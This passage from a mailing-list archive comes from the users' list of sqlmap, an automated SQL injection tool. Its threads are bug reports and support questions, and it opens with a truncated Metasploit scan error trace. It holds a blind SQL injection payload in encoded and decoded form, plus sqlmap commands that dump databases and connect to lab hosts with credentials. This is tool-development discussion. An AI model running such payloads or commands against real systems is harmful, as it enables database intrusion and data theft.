"/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:3 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:4 exception Errno::EPIPE Broken pipe ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[*] 10.0.0.2 - Meterpreter session 1 closed.  Reason: Died
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > 
[08:25:28] [INFO] cleaning up the web files uploaded
[08:25:28] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[08:25:28] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/Desktop/sqlmapproject-sqlmap-9f21406/output/results-10232013_0512pm.csv'

[*] shutting down at 08:25:28



 		 	   		  

Re: [sqlmap-users] PAYLOAD_DELIMITER replace bug?

[Andres R. <and...@gm...>]

Thanks! Now I'm getting better results ;)

On Wed, Oct 23, 2013 at 1:08 PM, Miroslav Stampar
<mir...@gm...> wrote:
> It should be fixed now :)
>
> Bye
>
>
> On Wed, Oct 23, 2013 at 5:55 PM, Andres Riancho <and...@gm...>
> wrote:
>>
>> All right, thanks! :)
>>
>> On Wed, Oct 23, 2013 at 12:20 PM, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > Hi Andres.
>> >
>> > Expect a fix ASAP (<1 hour).
>> >
>> > Bye
>> >
>> > On Oct 23, 2013 5:18 PM, "Andres Riancho" <and...@gm...>
>> > wrote:
>> >>
>> >> I'm capturing sqlmap's traffic using burp and I see:
>> >>
>> >>
>> >>
>> >> %5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_
>> >>
>> >> Decoded:
>> >>
>> >> \_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\
>> >> WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\
>> >> END\)\)\
>> >> AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_
>> >>
>> >> I suspect that PAYLOAD_DELIMITER was intended to be replaced before
>> >> being sent?
>> >>
>> >> Also, what's with all the %5C? There is also a strange thing in this
>> >> request "RLIKE", which I suppose should be "OR LIKE" ?
>> >>
>> >> sqlmap/1.0-dev-28529a9
>> >>
>> >>
>> >>
>> >> ------------------------------------------------------------------------------
>> >> October Webinars: Code for Performance
>> >> Free Intel webinars can help you accelerate application performance.
>> >> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the
>> >> most
>> >> from
>> >> the latest Intel processors and coprocessors. See abstracts and
>> >> register >
>> >>
>> >>
>> >> http://pubads.g.doubleclick.net/gampad/clk?id=60135991&iu=/4140/ostg.clktrk
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/
>> Web Application Attack and Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm



-- 
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3

Re: [sqlmap-users] PAYLOAD_DELIMITER replace bug?

[Miroslav S. <mir...@gm...>]

It should be fixed now :)

Bye


On Wed, Oct 23, 2013 at 5:55 PM, Andres Riancho <and...@gm...>wrote:

> All right, thanks! :)
>
> On Wed, Oct 23, 2013 at 12:20 PM, Miroslav Stampar
> <mir...@gm...> wrote:
> > Hi Andres.
> >
> > Expect a fix ASAP (<1 hour).
> >
> > Bye
> >
> > On Oct 23, 2013 5:18 PM, "Andres Riancho" <and...@gm...>
> wrote:
> >>
> >> I'm capturing sqlmap's traffic using burp and I see:
> >>
> >>
> >>
> %5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_
> >>
> >> Decoded:
> >>
> >> \_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\
> >> WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\ END\)\)\
> >> AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_
> >>
> >> I suspect that PAYLOAD_DELIMITER was intended to be replaced before
> >> being sent?
> >>
> >> Also, what's with all the %5C? There is also a strange thing in this
> >> request "RLIKE", which I suppose should be "OR LIKE" ?
> >>
> >> sqlmap/1.0-dev-28529a9
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> October Webinars: Code for Performance
> >> Free Intel webinars can help you accelerate application performance.
> >> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> >> from
> >> the latest Intel processors and coprocessors. See abstracts and
> register >
> >>
> >>
> http://pubads.g.doubleclick.net/gampad/clk?id=60135991&iu=/4140/ostg.clktrk
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/
> Web Application Attack and Audit Framework
> Twitter: @w3af
> GPG: 0x93C344F3
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] PAYLOAD_DELIMITER replace bug?

[Andres R. <and...@gm...>]

All right, thanks! :)

On Wed, Oct 23, 2013 at 12:20 PM, Miroslav Stampar
<mir...@gm...> wrote:
> Hi Andres.
>
> Expect a fix ASAP (<1 hour).
>
> Bye
>
> On Oct 23, 2013 5:18 PM, "Andres Riancho" <and...@gm...> wrote:
>>
>> I'm capturing sqlmap's traffic using burp and I see:
>>
>>
>> %5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_
>>
>> Decoded:
>>
>> \_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\
>> WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\ END\)\)\
>> AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_
>>
>> I suspect that PAYLOAD_DELIMITER was intended to be replaced before
>> being sent?
>>
>> Also, what's with all the %5C? There is also a strange thing in this
>> request "RLIKE", which I suppose should be "OR LIKE" ?
>>
>> sqlmap/1.0-dev-28529a9
>>
>>
>> ------------------------------------------------------------------------------
>> October Webinars: Code for Performance
>> Free Intel webinars can help you accelerate application performance.
>> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
>> from
>> the latest Intel processors and coprocessors. See abstracts and register >
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=60135991&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users



-- 
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3

Re: [sqlmap-users] PAYLOAD_DELIMITER replace bug?

[Miroslav S. <mir...@gm...>]

Hi Andres.

Expect a fix ASAP (<1 hour).

Bye
On Oct 23, 2013 5:18 PM, "Andres Riancho" <and...@gm...> wrote:

> I'm capturing sqlmap's traffic using burp and I see:
>
>
> %5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_
>
> Decoded:
>
> \_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\
> WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\ END\)\)\
> AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_
>
> I suspect that PAYLOAD_DELIMITER was intended to be replaced before
> being sent?
>
> Also, what's with all the %5C? There is also a strange thing in this
> request "RLIKE", which I suppose should be "OR LIKE" ?
>
> sqlmap/1.0-dev-28529a9
>
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60135991&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

[sqlmap-users] PAYLOAD_DELIMITER replace bug?

[Andres R. <and...@gm...>]

I'm capturing sqlmap's traffic using burp and I see:

%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_

Decoded:

\_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\
WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\ END\)\)\
AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_

I suspect that PAYLOAD_DELIMITER was intended to be replaced before
being sent?

Also, what's with all the %5C? There is also a strange thing in this
request "RLIKE", which I suppose should be "OR LIKE" ?

sqlmap/1.0-dev-28529a9

Re: [sqlmap-users] Hsqldb support

[Brandon P. <bpe...@gm...>]

There are no errors and it is a time based injection, so not much to go on in terms of page content. I have no issues enumerating tables or bruteforcing columns.

Will test out the -f --banner args tonight. Good to hear it should be supported well.

Sent from a computer

> On Oct 23, 2013, at 0:56, Miroslav Stampar <mir...@gm...> wrote:
> 
> Hi Brandon.
> 
> HSQLDB should be considered as (fully) supported by sqlmap. Nevertheless, there is always a space for improvements.
> 
> You won't be able to run shell commands nor read OS files with it as it is a very constrained DBMS (Java based).
> 
> As of a problem with enumerating column names. Do you get any error message with --parse-errors or are there any messages inside the page response (you can use -t traffic.txt for this) when it is being done?
> 
> Do you get any information with -f --banner?
> 
> Kind regards, 
> Miroslav Stampar
> 
>> On Oct 22, 2013 11:17 PM, "Brandon Perry" <bpe...@gm...> wrote:
>> How supported would we consider hsqldb? Not sure of its limitations, but I seem to have trouble enumerating columns with it.
>> 
>> Also, --os-shell and --file-read report that hsqldb doesnt support either. Very possible, but I want to ensure it is because of technical limitations with hsqldb and not with partial support on the sqlmap side. If it is the latter, i am in a good spot to help better the support.
>> 
>> Sent from a computer
>> ------------------------------------------------------------------------------
>> October Webinars: Code for Performance
>> Free Intel webinars can help you accelerate application performance.
>> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most from
>> the latest Intel processors and coprocessors. See abstracts and register >
>> http://pubads.g.doubleclick.net/gampad/clk?id=60135991&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] Hsqldb support

[Miroslav S. <mir...@gm...>]

Hi Brandon.

HSQLDB should be considered as (fully) supported by sqlmap. Nevertheless,
there is always a space for improvements.

You won't be able to run shell commands nor read OS files with it as it is
a very constrained DBMS (Java based).

As of a problem with enumerating column names. Do you get any error message
with --parse-errors or are there any messages inside the page response (you
can use -t traffic.txt for this) when it is being done?

Do you get any information with -f --banner?

Kind regards,
Miroslav Stampar
On Oct 22, 2013 11:17 PM, "Brandon Perry" <bpe...@gm...> wrote:

> How supported would we consider hsqldb? Not sure of its limitations, but I
> seem to have trouble enumerating columns with it.
>
> Also, --os-shell and --file-read report that hsqldb doesnt support either.
> Very possible, but I want to ensure it is because of technical limitations
> with hsqldb and not with partial support on the sqlmap side. If it is the
> latter, i am in a good spot to help better the support.
>
> Sent from a computer
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60135991&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

[sqlmap-users] Hsqldb support

[Brandon P. <bpe...@gm...>]

How supported would we consider hsqldb? Not sure of its limitations, but I seem to have trouble enumerating columns with it.

Also, --os-shell and --file-read report that hsqldb doesnt support either. Very possible, but I want to ensure it is because of technical limitations with hsqldb and not with partial support on the sqlmap side. If it is the latter, i am in a good spot to help better the support.

Sent from a computer

Re: [sqlmap-users] Direct connection to Oracle supported?

[<in...@ex...>]

<html><body><span style="font-family:Verdana; color:#000000; font-size:10pt;"><div>&nbsp;I wish it were so easy.&nbsp; I tried with and without quotes and also specifying --dbms=Oracle</div>
<div>I'll clone the github version and try that in case the Kali version is somehow screwed up.</div>
<div>&nbsp;</div>
<BLOCKQUOTE style="BORDER-LEFT: blue 2px solid; PADDING-LEFT: 8px; FONT-FAMILY: verdana; COLOR: black; MARGIN-LEFT: 8px; FONT-SIZE: 10pt" id=replyBlockquote webmail="1">
<DIV id=wmQuoteWrapper>
<DIV dir=ltr>Maybe you forgot the quotes ?
<DIV><BR></DIV>
<DIV><PRE style="BORDER-BOTTOM: rgb(221,221,221) 1px solid; BORDER-LEFT: rgb(221,221,221) 1px solid; PADDING-BOTTOM: 6px; LINE-HEIGHT: 19px; BACKGROUND-COLOR: rgb(248,248,248); MARGIN-TOP: 15px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; FONT-FAMILY: Consolas,'Liberation Mono',Courier,monospace; MARGIN-BOTTOM: 15px; COLOR: rgb(51,51,51); FONT-SIZE: 13px; OVERFLOW: auto; BORDER-TOP: rgb(221,221,221) 1px solid; BORDER-RIGHT: rgb(221,221,221) 1px solid; PADDING-TOP: 6px; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px">
<CODE style="BORDER-BOTTOM: medium none; BORDER-LEFT: medium none; PADDING-BOTTOM: 0px; BACKGROUND-COLOR: transparent; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; FONT-FAMILY: Consolas,'Liberation Mono',Courier,monospace; WORD-WRAP: normal; FONT-SIZE: 12px; BORDER-TOP: medium none; BORDER-RIGHT: medium none; PADDING-TOP: 0px; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px">python <a href="http://sqlmap.py">sqlmap.py</a> -d "mysql://<A href="http://admin:admin@192.168.21.17:3306/testdb" target=_blank>admin:admin@192.168.21.17:3306/testdb</A>" -f --banner --dbs --users</CODE></PRE></DIV>
<DIV class=gmail_extra><BR><BR>
<DIV class=gmail_quote>On Mon, Oct 21, 2013 at 8:17 PM, Miroslav Stampar <SPAN dir=ltr>&lt;<A href="mailto:mir...@gm..." target=_blank>mir...@gm...</A>&gt;</SPAN> wrote:<BR>
<BLOCKQUOTE style="BORDER-LEFT: #ccc 1px solid; MARGIN: 0px 0px 0px 0.8ex; PADDING-LEFT: 1ex" class=gmail_quote>
<DIV dir=ltr>Hi.
<DIV><BR></DIV>
<DIV>sqlmap supports it. Sample console output:</DIV>
<DIV><BR></DIV>
<DIV>
<DIV>$ python <a href="http://sqlmap.py">sqlmap.py</a> -d "oracle://<A href="http://SYSTEM:testpass@192.168.5.27:1521/testdb" target=_blank>SYSTEM:testpass@192.168.5.27:1521/testdb</A>" -v 5 --banner</DIV>
<DIV><BR></DIV>
<DIV>&nbsp; &nbsp; sqlmap/1.0-dev-8dac47f - automatic SQL injection and database takeover tool</DIV>
<DIV>&nbsp; &nbsp; <A href="http://sqlmap.org/" target=_blank>http://sqlmap.org</A></DIV>
<DIV><BR></DIV>
<DIV>[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</DIV>
<DIV><BR></DIV>
<DIV>[*] starting at 20:15:37</DIV>
<DIV><BR></DIV>
<DIV>[20:15:37] [DEBUG] cleaning up configuration parameters</DIV>
<DIV>[20:15:37] [DEBUG] forcing timeout to 10 seconds</DIV>
<DIV>[20:15:37] [INFO] connection to oracle server <A href="http://192.168.5.27:1521/" target=_blank>192.168.5.27:1521</A> established</DIV>
<DIV>[20:15:37] [INFO] the back-end DBMS is Oracle</DIV>
<DIV>[20:15:37] [INFO] fetching banner</DIV>
<DIV>[20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM v$version WHERE ROWNUM=1</DIV>
<DIV>back-end DBMS: Oracle</DIV>
<DIV>banner: &nbsp; &nbsp;'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'</DIV>
<DIV>[20:15:37] [INFO] connection to oracle server <A href="http://192.168.5.27:1521/" target=_blank>192.168.5.27:1521</A> closed</DIV>
<DIV><BR></DIV>
<DIV>[*] shutting down at 20:15:37</DIV></DIV>
<DIV><BR></DIV>
<DIV>Could you please check that you run the latest revision from the Github repository and try to run it with -v 5? Strange thing with your case is "sqlmap was not able to fingerprint..." while there is no fingerprinting in sqlmap's direct mode (at least in HEAD revision).</DIV>
<DIV><BR></DIV>
<DIV>Kind regards,</DIV>
<DIV>Miroslav Stampar</DIV></DIV>
<DIV class=gmail_extra>
<DIV>
<DIV class=h5><BR><BR>
<DIV class=gmail_quote>On Mon, Oct 21, 2013 at 7:24 PM, Brian Milliron <SPAN dir=ltr>&lt;<A href="mailto:Br...@ec..." target=_blank>Br...@ec...</A>&gt;</SPAN> wrote:<BR>
<BLOCKQUOTE style="BORDER-LEFT: #ccc 1px solid; MARGIN: 0px 0px 0px 0.8ex; PADDING-LEFT: 1ex" class=gmail_quote>Using sqlmap on a recently updated Kali installation, I tried to connect<BR>to an Oracle db using this command:<BR>sqlmap -d Oracle://<A href="http://user:pass@10.10.10.10:1521/SID" target=_blank>user:pass@10.10.10.10:1521/SID</A><BR>I get the error message "[CRITICAL] sqlmap was not able to fingerprint<BR>the back-end database management system. &nbsp;Support for this DBMS will be<BR>implemented at some point.<BR><BR>The wiki on github states that Oracle is supported for direct<BR>connections, so there is some confusion here. &nbsp;Wireshark confirms no<BR>attempt to connect to the server is made at all and the syntax of the<BR>command appears correct. &nbsp;Can you confirm whether sqlmap currently<BR>supports direct connections to Oracle databases or if there is some<BR>other problem?<BR><BR><BR>--<BR>Brian Milliron, CEO<BR>ECR Security<BR><A href="http://www.ecrsecurity.com/" target=_blank>http://www.ECRSecurity.com</A><BR><A href="tel:512-422-5408" target=_blank value="+15124225408">512-422-5408</A><BR><BR>------------------------------------------------------------------------------<BR>October Webinars: Code for Performance<BR>Free Intel webinars can help you accelerate application performance.<BR>Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most from<BR>the latest Intel processors and coprocessors. See abstracts and register &gt;<BR><A href="http://pubads.g.doubleclick.net/gampad/clk?id=60135031&amp;iu=/4140/ostg.clktrk" target=_blank>http://pubads.g.doubleclick.net/gampad/clk?id=60135031&amp;iu=/4140/ostg.clktrk</A><BR>_______________________________________________<BR>sqlmap-users mailing list<BR><A href="mailto:sql...@li..." target=_blank>sql...@li...</A><BR><A href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target=_blank>https://lists.sourceforge.net/lists/listinfo/sqlmap-users</A><BR></BLOCKQUOTE></DIV><BR><BR clear=all>
<DIV><BR></DIV></DIV></DIV><SPAN class=HOEnZb><FONT color=#888888>-- <BR>Miroslav Stampar<BR><A href="http://about.me/stamparm" target=_blank>http://about.me/stamparm</A> </FONT></SPAN></DIV><BR>------------------------------------------------------------------------------<BR>October Webinars: Code for Performance<BR>Free Intel webinars can help you accelerate application performance.<BR>Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most from<BR>the latest Intel processors and coprocessors. See abstracts and register &gt;<BR><A href="http://pubads.g.doubleclick.net/gampad/clk?id=60135991&amp;iu=/4140/ostg.clktrk" target=_blank>http://pubads.g.doubleclick.net/gampad/clk?id=60135991&amp;iu=/4140/ostg.clktrk</A><BR>_______________________________________________<BR>sqlmap-users mailing list<BR><A href="mailto:sql...@li..." target=_blank>sql...@li...</A><BR><A href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target=_blank>https://lists.sourceforge.net/lists/listinfo/sqlmap-users</A><BR><BR></BLOCKQUOTE></DIV><BR><BR clear=all>
<DIV><BR></DIV>-- <BR>
<DIV dir=ltr>
<DIV><B><FONT color=#444444>Yoan AGOSTINI</FONT></B></DIV></DIV></DIV></DIV></DIV></BLOCKQUOTE></span></body></html>

Re: [sqlmap-users] Bug in SQLMap

[FAZ <jus...@ya...>]

Thanks for your reply ... Test started 

Re: [sqlmap-users] Bug in SQLMap

[Miroslav S. <mir...@gm...>]

Hi.

I've made couple of changes this moment. Can you please retry it now?

Also, in case that it fails again I would need more information about the
data itself. Thing is that we are already prepared for large table dumps
but your case is kind of specific. How many columns are there in that
table? What's the size of entries in those columns (>1000 chars)?

Kind regards,
Miroslav Stampar


On Sun, Oct 20, 2013 at 1:38 AM, FAZ <jus...@ya...> wrote:

> Dears,
>
> Fyi, .... I got the below error after executing the query on "big" table
> of users in my test lab.
>
> btw, it's on the latest version
>
> [16:07:17] [ERROR] thread 2:
>
>
> [16:07:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2ee4b81, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-2ee4b81
> Python version: 2.7.5
> Operating system: posix
> Command line: sqlmap.py -u ****************************************
> --exclude-sysdbs --dump --threads 10 --hex
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 95, in main
>     start()
>   File "/home/testz/sqlmap/sqlmap-dev/lib/controller/controller.py", line
> 582, in start
>     action()
>   File "/home/testz/sqlmap/sqlmap-dev/lib/controller/action.py", line 127,
> in action
>     conf.dbmsHandler.dumpTable()
>   File "/home/testz/sqlmap/sqlmap-dev/plugins/generic/entries.py", line
> 168, in dumpTable
>     entries = inject.getValue(query, blind=False, time=False, dump=True)
>   File "/home/testz/sqlmap/sqlmap-dev/lib/request/inject.py", line 360, in
> getValue
>     value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else
> query, unpack, dump)
>   File "/home/testz/sqlmap/sqlmap-dev/lib/request/inject.py", line 312, in
> _goUnion
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "/home/testz/sqlmap/sqlmap-dev/lib/techniques/union/use.py", line
> 329, in unionUse
>     threadData.shared.value.extend(arrayizeValue(_[1]))
>   File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 45, in
> extend
>     self.append(_)
>   File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 38, in
> append
>     filename = self._dump(self.chunks[-1])
>   File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 65, in
> _dump
>     pickle.dump(value, fp)
